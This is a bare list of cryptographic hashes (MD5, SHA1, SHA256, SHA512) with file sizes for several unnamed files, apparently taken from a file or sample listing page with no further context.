SHA256: 675f8327b34ce8007cdf61d53ef6470e595f061c3964299bc0a8eb9a1c4a94b7
SHA512: 840c9baafe8c96faea516c7c0a9b94fb6d80aa0fa51307045f661f3cf4420f6a8f44432c8015e37016a54ac711933d51f7c8d5e7084a4863179f122ef9893cd5

Filesize: 272KB
MD5: e7e428bd0477b1edaaa610c2f2e23a0f
SHA1: c235f60fabcc52c8190f6be09fe0458740706c81
SHA256: a14e7695460243625cb5ec1c58208f929b5201c96a63231ddca3ec2ae883d7fc
SHA512: 206d14c3dc7d99199cc31e934899e79e51e100ac838702db747e9ff80c847ac29b886f9cd2f9dafdf5975405b66d090dd8b8c7e2004fba7c05ec6fd7b75f92cb

Filesize: 272KB
MD5: b785ce21bea2dd8ec2da499b806dffd6
SHA1: 0d98f35b2cde807564b8d89277bd39615008c871
SHA256: f61fa76157c70b2551e9413fc6d14ee867f927b9bc0435da8327a6618b993314
SHA512: ce4791a52b6eaedf5466d3164c55033fbd6819ca8f6dffc35af45a97727a318224854813506e5c6245c5a4df8ca01d84548000f84fb23057c7f8f171fa574bc8

Filesize: 272KB
MD5: 282a54a9a4317c57c25921c92a82d0f1
SHA1: a16dbb8fab33b5f1756c705b894248705bbcbeb4
SHA256: 60cba8e475b8ca2aef34b80a9abf85fdfbc28bc4acd988dd50d15c0ad1bf15ca
SHA512: 4f3abd0bd2b94d160051ea33078a4c8e05f305d68128de06f0436845b999a7023b8238d31737ff3f626f353b0a6cdd174d3ff058f3bb51a0d090407235f69a22

Filesize: 272KB
MD5: 96cca09902ae4ed97c5525fce57990f2
SHA1: 4297fdee57ddc726a3ed8c1cba0fa980f7f97977
SHA256: af013c172071529d1880c6e1c4a9f7fbfcefae7ba11d62d35f03f1bb4e1071c9
SHA512: fc8f3b47ac4632521cc86f4ebdb0b7cb462af9f935cc97db8cf88f1496f3e5058527492893ad55be99a8e38404bf955fe83ae5867118549e5d7428edeb2ad1c2

Filesize: 640B
MD5: 5d142e7978321fde49abd9a068b64d97
SHA1: 70020fcf7f3d6dafb6c8cd7a55395196a487bef4
SHA256: fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061
SHA512: 2351284652a9a1b35006baf4727a85199406e464ac33cb4701a6182e1076aaff022c227dbe4ad6e916eba15ebad08b10719a8e86d5a0f89844a163a7d4a7bbf9

Filesize: 217B
MD5: c00d8433fe598abff197e690231531e0
SHA1: 4f6b87a4327ff5343e9e87275d505b9f145a7e42
SHA256: 52fb776a91b260bf196016ecb195550cdd9084058fe7b4dd3fe2d4fda1b6470e
SHA512: a71523ec2bd711e381a37baabd89517dff6c6530a435f4382b7f4056f98aff5d6014e85ce3b79bd1f02fdd6adc925cd3fc051752c1069e9eb511a465cd9908e1